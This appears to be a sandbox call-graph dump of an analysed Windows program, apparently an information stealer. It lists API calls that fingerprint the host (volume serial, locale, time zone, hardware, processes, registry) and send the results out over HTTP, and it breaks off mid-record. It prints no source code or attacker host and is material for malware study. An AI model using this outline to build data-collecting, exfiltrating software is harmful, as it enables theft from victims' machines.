GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14467->14469 14470 9ba67d 14467->14470 14468->14467 14469->14470 14471 9ba69e 14470->14471 14472 9ba686 GetProcAddress 14470->14472 14473 9b5ca3 14471->14473 14474 9ba6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14471->14474 14472->14471 14475 9a1590 14473->14475 14474->14473 15595 9a1670 14475->15595 14478 9ba7a0 lstrcpy 14479 9a15b5 14478->14479 14480 9ba7a0 lstrcpy 14479->14480 14481 9a15c7 14480->14481 14482 9ba7a0 lstrcpy 14481->14482 14483 9a15d9 14482->14483 14484 9ba7a0 lstrcpy 14483->14484 14485 9a1663 14484->14485 14486 9b5510 14485->14486 14487 9b5521 14486->14487 14488 9ba820 2 API calls 14487->14488 14489 9b552e 14488->14489 14490 9ba820 2 API calls 14489->14490 14491 9b553b 14490->14491 14492 9ba820 2 API calls 14491->14492 14493 9b5548 14492->14493 14494 9ba740 lstrcpy 14493->14494 14495 9b5555 14494->14495 14496 9ba740 lstrcpy 14495->14496 14497 9b5562 14496->14497 14498 9ba740 lstrcpy 14497->14498 14499 9b556f 14498->14499 14500 9ba740 lstrcpy 14499->14500 14525 9b557c 14500->14525 14501 9a1590 lstrcpy 14501->14525 14502 9b52c0 25 API calls 14502->14525 14503 9b5643 StrCmpCA 14503->14525 14504 9b56a0 StrCmpCA 14505 9b57dc 14504->14505 14504->14525 14506 9ba8a0 lstrcpy 14505->14506 14507 9b57e8 14506->14507 14508 9ba820 2 API calls 14507->14508 14509 9b57f6 14508->14509 14511 9ba820 2 API calls 14509->14511 14510 9b5856 StrCmpCA 14512 9b5991 14510->14512 14510->14525 14516 9b5805 14511->14516 14515 9ba8a0 lstrcpy 14512->14515 14513 9ba740 lstrcpy 14513->14525 14514 9ba8a0 lstrcpy 14514->14525 14517 9b599d 14515->14517 14518 9a1670 lstrcpy 14516->14518 14520 9ba820 2 API calls 14517->14520 14521 9b5811 14518->14521 14519 9ba820 lstrlen lstrcpy 14519->14525 14522 9b59ab 14520->14522 14521->13593 14526 9ba820 2 API calls 14522->14526 14523 9b5a0b StrCmpCA 14527 9b5a28 14523->14527 14528 9b5a16 Sleep 14523->14528 14524 9ba7a0 lstrcpy 14524->14525 14525->14501 14525->14502 14525->14503 14525->14504 14525->14510 14525->14513 14525->14514 14525->14519 14525->14523 14525->14524 14535 9b51f0 20 API calls 14525->14535 14538 9b578a StrCmpCA 14525->14538 14540 9b593f StrCmpCA 14525->14540 14530 9b59ba 14526->14530 14529 9ba8a0 lstrcpy 14527->14529 14528->14525 14531 9b5a34 14529->14531 14532 9a1670 lstrcpy 14530->14532 14533 9ba820 2 API calls 14531->14533 14532->14521 14534 9b5a43 14533->14534 14536 9ba820 2 API calls 14534->14536 14535->14525 14537 9b5a52 14536->14537 14539 9a1670 lstrcpy 14537->14539 14538->14525 14539->14521 14540->14525 14542 9b754c 14541->14542 14543 9b7553 GetVolumeInformationA 14541->14543 14542->14543 14547 9b7591 14543->14547 14544 9b75fc GetProcessHeap RtlAllocateHeap 14545 9b7619 14544->14545 14546 9b7628 wsprintfA 14544->14546 14548 9ba740 lstrcpy 14545->14548 14549 9ba740 lstrcpy 14546->14549 14547->14544 14550 9b5da7 14548->14550 14549->14550 14550->13614 14552 9ba7a0 lstrcpy 14551->14552 14553 9a4899 14552->14553 15604 9a47b0 14553->15604 14555 9a48a5 14556 9ba740 lstrcpy 14555->14556 14557 9a48d7 14556->14557 14558 9ba740 lstrcpy 14557->14558 14559 9a48e4 14558->14559 14560 9ba740 lstrcpy 14559->14560 14561 9a48f1 14560->14561 14562 9ba740 lstrcpy 14561->14562 14563 9a48fe 14562->14563 14564 9ba740 lstrcpy 14563->14564 14565 9a490b InternetOpenA StrCmpCA 14564->14565 14566 9a4944 14565->14566 14567 9a4ecb InternetCloseHandle 14566->14567 14568 9a4955 14566->14568 14570 9a4ee8 14567->14570 15615 9b8b60 14568->15615 15610 9a9ac0 CryptStringToBinaryA 14570->15610 14571 9a4963 15623 9ba920 14571->15623 14574 9a4976 14576 9ba8a0 lstrcpy 14574->14576 14581 9a497f 14576->14581 14577 9ba820 2 API calls 14578 9a4f05 14577->14578 14580 9ba9b0 4 API calls 14578->14580 14579 9a4f27 ctype 14583 9ba7a0 lstrcpy 14579->14583 14582 9a4f1b 14580->14582 14585 9ba9b0 4 API calls 14581->14585 14584 9ba8a0 lstrcpy 14582->14584 14596 9a4f57 14583->14596 14584->14579 14586 9a49a9 14585->14586 14587 9ba8a0 lstrcpy 14586->14587 14588 9a49b2 14587->14588 14589 9ba9b0 4 API calls 14588->14589 14590 9a49d1 14589->14590 14591 9ba8a0 lstrcpy 14590->14591 14592 9a49da 14591->14592 14593 9ba920 3 API calls 14592->14593 14594 9a49f8 14593->14594 14595 9ba8a0 lstrcpy 14594->14595 14597 9a4a01 14595->14597 14596->13617 14598 9ba9b0 4 API calls 14597->14598 14599 9a4a20 14598->14599 14600 9ba8a0 lstrcpy 14599->14600 14601 9a4a29 14600->14601 14602 9ba9b0 4 API calls 14601->14602 14603 9a4a48 14602->14603 14604 9ba8a0 lstrcpy 14603->14604 14605 9a4a51 14604->14605 14606 9ba9b0 4 API calls 14605->14606 14607 9a4a7d 14606->14607 14608 9ba920 3 API calls 14607->14608 14609 9a4a84 14608->14609 14610 9ba8a0 lstrcpy 14609->14610 14611 9a4a8d 14610->14611 14612 9a4aa3 InternetConnectA 14611->14612 14612->14567 14613 9a4ad3 HttpOpenRequestA 14612->14613 14615 9a4b28 14613->14615 14616 9a4ebe InternetCloseHandle 14613->14616 14617 9ba9b0 4 API calls 14615->14617 14616->14567 14618 9a4b3c 14617->14618 14619 9ba8a0 lstrcpy 14618->14619 14620 9a4b45 14619->14620 14621 9ba920 3 API calls 14620->14621 14622 9a4b63 14621->14622 14623 9ba8a0 lstrcpy 14622->14623 14624 9a4b6c 14623->14624 14625 9ba9b0 4 API calls 14624->14625 14626 9a4b8b 14625->14626 14627 9ba8a0 lstrcpy 14626->14627 14628 9a4b94 14627->14628 14629 9ba9b0 4 API calls 14628->14629 14630 9a4bb5 14629->14630 14631 9ba8a0 lstrcpy 14630->14631 14632 9a4bbe 14631->14632 14633 9ba9b0 4 API calls 14632->14633 14634 9a4bde 14633->14634 14635 9ba8a0 lstrcpy 14634->14635 14636 9a4be7 14635->14636 14637 9ba9b0 4 API calls 14636->14637 14638 9a4c06 14637->14638 14639 9ba8a0 lstrcpy 14638->14639 14640 9a4c0f 14639->14640 14641 9ba920 3 API calls 14640->14641 14642 9a4c2d 14641->14642 14643 9ba8a0 lstrcpy 14642->14643 14644 9a4c36 14643->14644 14645 9ba9b0 4 API calls 14644->14645 14646 9a4c55 14645->14646 14647 9ba8a0 lstrcpy 14646->14647 14648 9a4c5e 14647->14648 14649 9ba9b0 4 API calls 14648->14649 14650 9a4c7d 14649->14650 14651 9ba8a0 lstrcpy 14650->14651 14652 9a4c86 14651->14652 14653 9ba920 3 API calls 14652->14653 14654 9a4ca4 14653->14654 14655 9ba8a0 lstrcpy 14654->14655 14656 9a4cad 14655->14656 14657 9ba9b0 4 API calls 14656->14657 14658 9a4ccc 14657->14658 14659 9ba8a0 lstrcpy 14658->14659 14660 9a4cd5 14659->14660 14661 9ba9b0 4 API calls 14660->14661 14662 9a4cf6 14661->14662 14663 9ba8a0 lstrcpy 14662->14663 14664 9a4cff 14663->14664 14665 9ba9b0 4 API calls 14664->14665 14666 9a4d1f 14665->14666 14667 9ba8a0 lstrcpy 14666->14667 14668 9a4d28 14667->14668 14669 9ba9b0 4 API calls 14668->14669 14670 9a4d47 14669->14670 14671 9ba8a0 lstrcpy 14670->14671 14672 9a4d50 14671->14672 14673 9ba920 3 API calls 14672->14673 14674 9a4d6e 14673->14674 14675 9ba8a0 lstrcpy 14674->14675 14676 9a4d77 14675->14676 14677 9ba740 lstrcpy 14676->14677 14678 9a4d92 14677->14678 14679 9ba920 3 API calls 14678->14679 14680 9a4db3 14679->14680 14681 9ba920 3 API calls 14680->14681 14682 9a4dba 14681->14682 14683 9ba8a0 lstrcpy 14682->14683 14684 9a4dc6 14683->14684 14685 9a4de7 lstrlen 14684->14685 14686 9a4dfa 14685->14686 14687 9a4e03 lstrlen 14686->14687 15629 9baad0 14687->15629 14689 9a4e13 HttpSendRequestA 14690 9a4e32 InternetReadFile 14689->14690 14691 9a4e67 InternetCloseHandle 14690->14691 14696 9a4e5e 14690->14696 14693 9ba800 14691->14693 14693->14616 14694 9ba9b0 4 API calls 14694->14696 14695 9ba8a0 lstrcpy 14695->14696 14696->14690 14696->14691 14696->14694 14696->14695 15631 9baad0 14697->15631 14699 9b17c4 StrCmpCA 14700 9b17cf ExitProcess 14699->14700 14711 9b17d7 14699->14711 14701 9b187f StrCmpCA 14701->14711 14702 9b185d StrCmpCA 14702->14711 14703 9b1913 StrCmpCA 14703->14711 14704 9b1932 StrCmpCA 14704->14711 14705 9b18f1 StrCmpCA 14705->14711 14706 9b1951 StrCmpCA 14706->14711 14707 9b1970 StrCmpCA 14707->14711 14708 9b18cf StrCmpCA 14708->14711 14709 9b18ad StrCmpCA 14709->14711 14710 9b19c2 14710->13619 14711->14701 14711->14702 14711->14703 14711->14704 14711->14705 14711->14706 14711->14707 14711->14708 14711->14709 14711->14710 14712 9ba820 lstrlen lstrcpy 14711->14712 14712->14711 14714 9ba7a0 lstrcpy 14713->14714 14715 9a5979 14714->14715 14716 9a47b0 2 API calls 14715->14716 14717 9a5985 14716->14717 14718 9ba740 lstrcpy 14717->14718 14719 9a59ba 14718->14719 14720 9ba740 lstrcpy 14719->14720 14721 9a59c7 14720->14721 14722 9ba740 lstrcpy 14721->14722 14723 9a59d4 14722->14723 14724 9ba740 lstrcpy 14723->14724 14725 9a59e1 14724->14725 14726 9ba740 lstrcpy 14725->14726 14727 9a59ee InternetOpenA StrCmpCA 14726->14727 14728 9a5a1d 14727->14728 14729 9a5fc3 InternetCloseHandle 14728->14729 14730 9b8b60 3 API calls 14728->14730 14731 9a5fe0 14729->14731 14732 9a5a3c 14730->14732 14734 9a9ac0 4 API calls 14731->14734 14733 9ba920 3 API calls 14732->14733 14735 9a5a4f 14733->14735 14736 9a5fe6 14734->14736 14737 9ba8a0 lstrcpy 14735->14737 14738 9ba820 2 API calls 14736->14738 14741 9a601f ctype 14736->14741 14743 9a5a58 14737->14743 14739 9a5ffd 14738->14739 14740 9ba9b0 4 API calls 14739->14740 14742 9a6013 14740->14742 14745 9ba7a0 lstrcpy 14741->14745 14744 9ba8a0 lstrcpy 14742->14744 14746 9ba9b0 4 API calls 14743->14746 14744->14741 14754 9a604f 14745->14754 14747 9a5a82 14746->14747 14748 9ba8a0 lstrcpy 14747->14748 14749 9a5a8b 14748->14749 14750 9ba9b0 4 API calls 14749->14750 14751 9a5aaa 14750->14751 14752 9ba8a0 lstrcpy 14751->14752 14753 9a5ab3 14752->14753 14755 9ba920 3 API calls 14753->14755 14754->13625 14756 9a5ad1 14755->14756 14757 9ba8a0 lstrcpy 14756->14757 14758 9a5ada 14757->14758 14759 9ba9b0 4 API calls 14758->14759 14760 9a5af9 14759->14760 14761 9ba8a0 lstrcpy 14760->14761 14762 9a5b02 14761->14762 14763 9ba9b0 4 API calls 14762->14763 14764 9a5b21 14763->14764 14765 9ba8a0 lstrcpy 14764->14765 14766 9a5b2a 14765->14766 14767 9ba9b0 4 API calls 14766->14767 14768 9a5b56 14767->14768 14769 9ba920 3 API calls 14768->14769 14770 9a5b5d 14769->14770 14771 9ba8a0 lstrcpy 14770->14771 14772 9a5b66 14771->14772 14773 9a5b7c InternetConnectA 14772->14773 14773->14729 14774 9a5bac HttpOpenRequestA 14773->14774 14776 9a5c0b 14774->14776 14777 9a5fb6 InternetCloseHandle 14774->14777 14778 9ba9b0 4 API calls 14776->14778 14777->14729 14779 9a5c1f 14778->14779 14780 9ba8a0 lstrcpy 14779->14780 14781 9a5c28 14780->14781 14782 9ba920 3 API calls 14781->14782 14783 9a5c46 14782->14783 14784 9ba8a0 lstrcpy 14783->14784 14785 9a5c4f 14784->14785 14786 9ba9b0 4 API calls 14785->14786 14787 9a5c6e 14786->14787 14788 9ba8a0 lstrcpy 14787->14788 14789 9a5c77 14788->14789 14790 9ba9b0 4 API calls 14789->14790 14791 9a5c98 14790->14791 14792 9ba8a0 lstrcpy 14791->14792 14793 9a5ca1 14792->14793 14794 9ba9b0 4 API calls 14793->14794 14795 9a5cc1 14794->14795 14796 9ba8a0 lstrcpy 14795->14796 14797 9a5cca 14796->14797 14798 9ba9b0 4 API calls 14797->14798 14799 9a5ce9 14798->14799 14800 9ba8a0 lstrcpy 14799->14800 14801 9a5cf2 14800->14801 14802 9ba920 3 API calls 14801->14802 14803 9a5d10 14802->14803 14804 9ba8a0 lstrcpy 14803->14804 14805 9a5d19 14804->14805 14806 9ba9b0 4 API calls 14805->14806 14807 9a5d38 14806->14807 14808 9ba8a0 lstrcpy 14807->14808 14809 9a5d41 14808->14809 14810 9ba9b0 4 API calls 14809->14810 14811 9a5d60 14810->14811 14812 9ba8a0 lstrcpy 14811->14812 14813 9a5d69 14812->14813 14814 9ba920 3 API calls 14813->14814 14815 9a5d87 14814->14815 14816 9ba8a0 lstrcpy 14815->14816 14817 9a5d90 14816->14817 14818 9ba9b0 4 API calls 14817->14818 14819 9a5daf 14818->14819 14820 9ba8a0 lstrcpy 14819->14820 14821 9a5db8 14820->14821 14822 9ba9b0 4 API calls 14821->14822 14823 9a5dd9 14822->14823 14824 9ba8a0 lstrcpy 14823->14824 14825 9a5de2 14824->14825 14826 9ba9b0 4 API calls 14825->14826 14827 9a5e02 14826->14827 14828 9ba8a0 lstrcpy 14827->14828 14829 9a5e0b 14828->14829 14830 9ba9b0 4 API calls 14829->14830 14831 9a5e2a 14830->14831 14832 9ba8a0 lstrcpy 14831->14832 14833 9a5e33 14832->14833 14834 9ba920 3 API calls 14833->14834 14835 9a5e54 14834->14835 14836 9ba8a0 lstrcpy 14835->14836 14837 9a5e5d 14836->14837 14838 9a5e70 lstrlen 14837->14838 15632 9baad0 14838->15632 14840 9a5e81 lstrlen GetProcessHeap RtlAllocateHeap 15633 9baad0 14840->15633 14842 9a5eae lstrlen 14843 9a5ebe 14842->14843 14844 9a5ed7 lstrlen 14843->14844 14845 9a5ee7 14844->14845 14846 9a5ef0 lstrlen 14845->14846 14847 9a5f04 14846->14847 14848 9a5f1a lstrlen 14847->14848 15634 9baad0 14848->15634 14850 9a5f2a HttpSendRequestA 14851 9a5f35 InternetReadFile 14850->14851 14852 9a5f6a InternetCloseHandle 14851->14852 14853 9a5f61 14851->14853 14852->14777 14853->14851 14853->14852 14855 9ba9b0 4 API calls 14853->14855 14856 9ba8a0 lstrcpy 14853->14856 14855->14853 14856->14853 14859 9b1077 14857->14859 14858 9b1151 14858->13627 14859->14858 14860 9ba820 lstrlen lstrcpy 14859->14860 14860->14859 14863 9b0db7 14861->14863 14862 9b0f17 14862->13635 14863->14862 14864 9b0e27 StrCmpCA 14863->14864 14865 9b0e67 StrCmpCA 14863->14865 14866 9b0ea4 StrCmpCA 14863->14866 14867 9ba820 lstrlen lstrcpy 14863->14867 14864->14863 14865->14863 14866->14863 14867->14863 14869 9b0f67 14868->14869 14870 9b1044 14869->14870 14871 9b0fb2 StrCmpCA 14869->14871 14872 9ba820 lstrlen lstrcpy 14869->14872 14870->13643 14871->14869 14872->14869 14874 9ba740 lstrcpy 14873->14874 14875 9b1a26 14874->14875 14876 9ba9b0 4 API calls 14875->14876 14877 9b1a37 14876->14877 14878 9ba8a0 lstrcpy 14877->14878 14879 9b1a40 14878->14879 14880 9ba9b0 4 API calls 14879->14880 14881 9b1a5b 14880->14881 14882 9ba8a0 lstrcpy 14881->14882 14883 9b1a64 14882->14883 14884 9ba9b0 4 API calls 14883->14884 14885 9b1a7d 14884->14885 14886 9ba8a0 lstrcpy 14885->14886 14887 9b1a86 14886->14887 14888 9ba9b0 4 API calls 14887->14888 14889 9b1aa1 14888->14889 14890 9ba8a0 lstrcpy 14889->14890 14891 9b1aaa 14890->14891 14892 9ba9b0 4 API calls 14891->14892 14893 9b1ac3 14892->14893 14894 9ba8a0 lstrcpy 14893->14894 14895 9b1acc 14894->14895 14896 9ba9b0 4 API calls 14895->14896 14897 9b1ae7 14896->14897 14898 9ba8a0 lstrcpy 14897->14898 14899 9b1af0 14898->14899 14900 9ba9b0 4 API calls 14899->14900 14901 9b1b09 14900->14901 14902 9ba8a0 lstrcpy 14901->14902 14903 9b1b12 14902->14903 14904 9ba9b0 4 API calls 14903->14904 14905 9b1b2d 14904->14905 14906 9ba8a0 lstrcpy 14905->14906 14907 9b1b36 14906->14907 14908 9ba9b0 4 API calls 14907->14908 14909 9b1b4f 14908->14909 14910 9ba8a0 lstrcpy 14909->14910 14911 9b1b58 14910->14911 14912 9ba9b0 4 API calls 14911->14912 14913 9b1b76 14912->14913 14914 9ba8a0 lstrcpy 14913->14914 14915 9b1b7f 14914->14915 14916 9b7500 6 API calls 14915->14916 14917 9b1b96 14916->14917 14918 9ba920 3 API calls 14917->14918 14919 9b1ba9 14918->14919 14920 9ba8a0 lstrcpy 14919->14920 14921 9b1bb2 14920->14921 14922 9ba9b0 4 API calls 14921->14922 14923 9b1bdc 14922->14923 14924 9ba8a0 lstrcpy 14923->14924 14925 9b1be5 14924->14925 14926 9ba9b0 4 API calls 14925->14926 14927 9b1c05 14926->14927 14928 9ba8a0 lstrcpy 14927->14928 14929 9b1c0e 14928->14929 15635 9b7690 GetProcessHeap RtlAllocateHeap 14929->15635 14932 9ba9b0 4 API calls 14933 9b1c2e 14932->14933 14934 9ba8a0 lstrcpy 14933->14934 14935 9b1c37 14934->14935 14936 9ba9b0 4 API calls 14935->14936 14937 9b1c56 14936->14937 14938 9ba8a0 lstrcpy 14937->14938 14939 9b1c5f 14938->14939 14940 9ba9b0 4 API calls 14939->14940 14941 9b1c80 14940->14941 14942 9ba8a0 lstrcpy 14941->14942 14943 9b1c89 14942->14943 15642 9b77c0 GetCurrentProcess IsWow64Process 14943->15642 14946 9ba9b0 4 API calls 14947 9b1ca9 14946->14947 14948 9ba8a0 lstrcpy 14947->14948 14949 9b1cb2 14948->14949 14950 9ba9b0 4 API calls 14949->14950 14951 9b1cd1 14950->14951 14952 9ba8a0 lstrcpy 14951->14952 14953 9b1cda 14952->14953 14954 9ba9b0 4 API calls 14953->14954 14955 9b1cfb 14954->14955 14956 9ba8a0 lstrcpy 14955->14956 14957 9b1d04 14956->14957 14958 9b7850 3 API calls 14957->14958 14959 9b1d14 14958->14959 14960 9ba9b0 4 API calls 14959->14960 14961 9b1d24 14960->14961 14962 9ba8a0 lstrcpy 14961->14962 14963 9b1d2d 14962->14963 14964 9ba9b0 4 API calls 14963->14964 14965 9b1d4c 14964->14965 14966 9ba8a0 lstrcpy 14965->14966 14967 9b1d55 14966->14967 14968 9ba9b0 4 API calls 14967->14968 14969 9b1d75 14968->14969 14970 9ba8a0 lstrcpy 14969->14970 14971 9b1d7e 14970->14971 14972 9b78e0 3 API calls 14971->14972 14973 9b1d8e 14972->14973 14974 9ba9b0 4 API calls 14973->14974 14975 9b1d9e 14974->14975 14976 9ba8a0 lstrcpy 14975->14976 14977 9b1da7 14976->14977 14978 9ba9b0 4 API calls 14977->14978 14979 9b1dc6 14978->14979 14980 9ba8a0 lstrcpy 14979->14980 14981 9b1dcf 14980->14981 14982 9ba9b0 4 API calls 14981->14982 14983 9b1df0 14982->14983 14984 9ba8a0 lstrcpy 14983->14984 14985 9b1df9 14984->14985 15644 9b7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 14985->15644 14988 9ba9b0 4 API calls 14989 9b1e19 14988->14989 14990 9ba8a0 lstrcpy 14989->14990 14991 9b1e22 14990->14991 14992 9ba9b0 4 API calls 14991->14992 14993 9b1e41 14992->14993 14994 9ba8a0 lstrcpy 14993->14994 14995 9b1e4a 14994->14995 14996 9ba9b0 4 API calls 14995->14996 14997 9b1e6b 14996->14997 14998 9ba8a0 lstrcpy 14997->14998 14999 9b1e74 14998->14999 15646 9b7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 14999->15646 15002 9ba9b0 4 API calls 15003 9b1e94 15002->15003 15004 9ba8a0 lstrcpy 15003->15004 15005 9b1e9d 15004->15005 15006 9ba9b0 4 API calls 15005->15006 15007 9b1ebc 15006->15007 15008 9ba8a0 lstrcpy 15007->15008 15009 9b1ec5 15008->15009 15010 9ba9b0 4 API calls 15009->15010 15011 9b1ee5 15010->15011 15012 9ba8a0 lstrcpy 15011->15012 15013 9b1eee 15012->15013 15649 9b7b00 GetUserDefaultLocaleName 15013->15649 15016 9ba9b0 4 API calls 15017 9b1f0e 15016->15017 15018 9ba8a0 lstrcpy 15017->15018 15019 9b1f17 15018->15019 15020 9ba9b0 4 API calls 15019->15020 15021 9b1f36 15020->15021 15022 9ba8a0 lstrcpy 15021->15022 15023 9b1f3f 15022->15023 15024 9ba9b0 4 API calls 15023->15024 15025 9b1f60 15024->15025 15026 9ba8a0 lstrcpy 15025->15026 15027 9b1f69 15026->15027 15653 9b7b90 15027->15653 15029 9b1f80 15030 9ba920 3 API calls 15029->15030 15031 9b1f93 15030->15031 15032 9ba8a0 lstrcpy 15031->15032 15033 9b1f9c 15032->15033 15034 9ba9b0 4 API calls 15033->15034 15035 9b1fc6 15034->15035 15036 9ba8a0 lstrcpy 15035->15036 15037 9b1fcf 15036->15037 15038 9ba9b0 4 API calls 15037->15038 15039 9b1fef 15038->15039 15040 9ba8a0 lstrcpy 15039->15040 15041 9b1ff8 15040->15041 15665 9b7d80 GetSystemPowerStatus 15041->15665 15044 9ba9b0 4 API calls 15045 9b2018 15044->15045 15046 9ba8a0 lstrcpy 15045->15046 15047 9b2021 15046->15047 15048 9ba9b0 4 API calls 15047->15048 15049 9b2040 15048->15049 15050 9ba8a0 lstrcpy 15049->15050 15051 9b2049 15050->15051 15052 9ba9b0 4 API calls 15051->15052 15053 9b206a 15052->15053 15054 9ba8a0 lstrcpy 15053->15054 15055 9b2073 15054->15055 15056 9b207e GetCurrentProcessId 15055->15056 15667 9b9470 OpenProcess 15056->15667 15059 9ba920 3 API calls 15060 9b20a4 15059->15060 15061 9ba8a0 lstrcpy 15060->15061 15062 9b20ad 15061->15062 15063 9ba9b0 4 API calls 15062->15063 15064 9b20d7 15063->15064 15065 9ba8a0 lstrcpy 15064->15065 15066 9b20e0 15065->15066 15067 9ba9b0 4 API calls 15066->15067 15068 9b2100 15067->15068 15069 9ba8a0 lstrcpy 15068->15069 15070 9b2109 15069->15070 15672 9b7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15070->15672 15073 9ba9b0 4 API calls 15074 9b2129 15073->15074 15075 9ba8a0 lstrcpy 15074->15075 15076 9b2132 15075->15076 15077 9ba9b0 4 API calls 15076->15077 15078 9b2151 15077->15078 15079 9ba8a0 lstrcpy 15078->15079 15080 9b215a 15079->15080 15081 9ba9b0 4 API calls 15080->15081 15082 9b217b 15081->15082 15083 9ba8a0 lstrcpy 15082->15083 15084 9b2184 15083->15084 15676 9b7f60 15084->15676 15087 9ba9b0 4 API calls 15088 9b21a4 15087->15088 15089 9ba8a0 lstrcpy 15088->15089 15090 9b21ad 15089->15090 15091 9ba9b0 4 API calls 15090->15091 15092 9b21cc 15091->15092 15093 9ba8a0 lstrcpy 15092->15093 15094 9b21d5 15093->15094 15095 9ba9b0 4 API calls 15094->15095 15096 9b21f6 15095->15096 15097 9ba8a0 lstrcpy 15096->15097 15098 9b21ff 15097->15098 15689 9b7ed0 GetSystemInfo wsprintfA 15098->15689 15101 9ba9b0 4 API calls 15102 9b221f 15101->15102 15103 9ba8a0 lstrcpy 15102->15103 15104 9b2228 15103->15104 15105 9ba9b0 4 API calls 15104->15105 15106 9b2247 15105->15106 15107 9ba8a0 lstrcpy 15106->15107 15108 9b2250 15107->15108 15109 9ba9b0 4 API calls 15108->15109 15110 9b2270 15109->15110 15111 9ba8a0 lstrcpy 15110->15111 15112 9b2279 15111->15112 15691 9b8100 GetProcessHeap RtlAllocateHeap 15112->15691 15115 9ba9b0 4 API calls 15116 9b2299 15115->15116 15117 9ba8a0 lstrcpy 15116->15117 15118 9b22a2 15117->15118 15119 9ba9b0 4 API calls 15118->15119 15120 9b22c1 15119->15120 15121 9ba8a0 lstrcpy 15120->15121 15122 9b22ca 15121->15122 15123 9ba9b0 4 API calls 15122->15123 15124 9b22eb 15123->15124 15125 9ba8a0 lstrcpy 15124->15125 15126 9b22f4 15125->15126 15697 9b87c0 15126->15697 15129 9ba920 3 API calls 15130 9b231e 15129->15130 15131 9ba8a0 lstrcpy 15130->15131 15132 9b2327 15131->15132 15133 9ba9b0 4 API calls 15132->15133 15134 9b2351 15133->15134 15135 9ba8a0 lstrcpy 15134->15135 15136 9b235a 15135->15136 15137 9ba9b0 4 API calls 15136->15137 15138 9b237a 15137->15138 15139 9ba8a0 lstrcpy 15138->15139 15140 9b2383 15139->15140 15141 9ba9b0 4 API calls 15140->15141 15142 9b23a2 15141->15142 15143 9ba8a0 lstrcpy 15142->15143 15144 9b23ab 15143->15144 15702 9b81f0 15144->15702 15146 9b23c2 15147 9ba920 3 API calls 15146->15147 15148 9b23d5 15147->15148 15149 9ba8a0 lstrcpy 15148->15149 15150 9b23de 15149->15150 15151 9ba9b0 4 API calls 15150->15151 15152 9b240a 15151->15152 15153 9ba8a0 lstrcpy 15152->15153 15154 9b2413 15153->15154 15155 9ba9b0 4 API calls 15154->15155 15156 9b2432 15155->15156 15157 9ba8a0 lstrcpy 15156->15157 15158 9b243b 15157->15158 15159 9ba9b0 4 API calls 15158->15159 15160 9b245c 15159->15160 15161 9ba8a0 lstrcpy 15160->15161 15162 9b2465 15161->15162 15163 9ba9b0 4 API calls 15162->15163 15164 9b2484 15163->15164 15165 9ba8a0 lstrcpy 15164->15165 15166 9b248d 15165->15166 15167 9ba9b0 4 API calls 15166->15167 15168 9b24ae 15167->15168 15169 9ba8a0 lstrcpy 15168->15169 15170 9b24b7 15169->15170 15710 9b8320 15170->15710 15172 9b24d3 15173 9ba920 3 API calls 15172->15173 15174 9b24e6 15173->15174 15175 9ba8a0 lstrcpy 15174->15175 15176 9b24ef 15175->15176 15177 9ba9b0 4 API calls 15176->15177 15178 9b2519 15177->15178 15179 9ba8a0 lstrcpy 15178->15179 15180 9b2522 15179->15180 15181 9ba9b0 4 API calls 15180->15181 15182 9b2543 15181->15182 15183 9ba8a0 lstrcpy 15182->15183 15184 9b254c 15183->15184 15185 9b8320 17 API calls 15184->15185 15186 9b2568 15185->15186 15187 9ba920 3 API calls 15186->15187 15188 9b257b 15187->15188 15189 9ba8a0 lstrcpy 15188->15189 15190 9b2584 15189->15190 15191 9ba9b0 4 API calls 15190->15191 15192 9b25ae 15191->15192 15193 9ba8a0 lstrcpy 15192->15193 15194 9b25b7 15193->15194 15195 9ba9b0 4 API calls 15194->15195 15196 9b25d6 15195->15196 15197 9ba8a0 lstrcpy 15196->15197 15198 9b25df 15197->15198 15199 9ba9b0 4 API calls 15198->15199 15200 9b2600 15199->15200 15201 9ba8a0 lstrcpy 15200->15201 15202 9b2609 15201->15202 15746 9b8680 15202->15746 15204 9b2620 15205 9ba920 3 API calls 15204->15205 15206 9b2633 15205->15206 15207 9ba8a0 lstrcpy 15206->15207 15208 9b263c 15207->15208 15209 9b265a lstrlen 15208->15209 15210 9b266a 15209->15210 15211 9ba740 lstrcpy 15210->15211 15212 9b267c 15211->15212 15213 9a1590 lstrcpy 15212->15213 15214 9b268d 15213->15214 15756 9b5190 15214->15756 15216 9b2699 15216->13647 15944 9baad0 15217->15944 15219 9a5009 InternetOpenUrlA 15223 9a5021 15219->15223 15220 9a502a InternetReadFile 15220->15223 15221 9a50a0 InternetCloseHandle InternetCloseHandle 15222 9a50ec 15221->15222 15222->13651 15223->15220 15223->15221 15945 9a98d0 15224->15945 15226 9b0759 15227 9b0a38 15226->15227 15228 9b077d 15226->15228 15229 9a1590 lstrcpy 15227->15229 15230 9b0799 StrCmpCA 15228->15230 15231 9b0a49 15229->15231 15233 9b0843 15230->15233 15234 9b07a8 15230->15234 16121 9b0250 15231->16121 15237 9b0865 StrCmpCA 15233->15237 15236 9ba7a0 lstrcpy 15234->15236 15238 9b07c3 15236->15238 15239 9b0874 15237->15239 15276 9b096b 15237->15276 15240 9a1590 lstrcpy 15238->15240 15241 9ba740 lstrcpy 15239->15241 15242 9b080c 15240->15242 15244 9b0881 15241->15244 15245 9ba7a0 lstrcpy 15242->15245 15243 9b099c StrCmpCA 15246 9b09ab 15243->15246 15265 9b0a2d 15243->15265 15247 9ba9b0 4 API calls 15244->15247 15248 9b0823 15245->15248 15249 9a1590 lstrcpy 15246->15249 15250 9b08ac 15247->15250 15251 9ba7a0 lstrcpy 15248->15251 15252 9b09f4 15249->15252 15253 9ba920 3 API calls 15250->15253 15254 9b083e 15251->15254 15255 9ba7a0 lstrcpy 15252->15255 15256 9b08b3 15253->15256 15948 9afb00 15254->15948 15258 9b0a0d 15255->15258 15259 9ba9b0 4 API calls 15256->15259 15260 9ba7a0 lstrcpy 15258->15260 15261 9b08ba 15259->15261 15262 9b0a28 15260->15262 15263 9ba8a0 lstrcpy 15261->15263 16064 9b0030 15262->16064 15265->13655 15276->15243 15596 9ba7a0 lstrcpy 15595->15596 15597 9a1683 15596->15597 15598 9ba7a0 lstrcpy 15597->15598 15599 9a1695 15598->15599 15600 9ba7a0 lstrcpy 15599->15600 15601 9a16a7 15600->15601 15602 9ba7a0 lstrcpy 15601->15602 15603 9a15a3 15602->15603 15603->14478 15605 9a47c6 15604->15605 15606 9a4838 lstrlen 15605->15606 15630 9baad0 15606->15630 15608 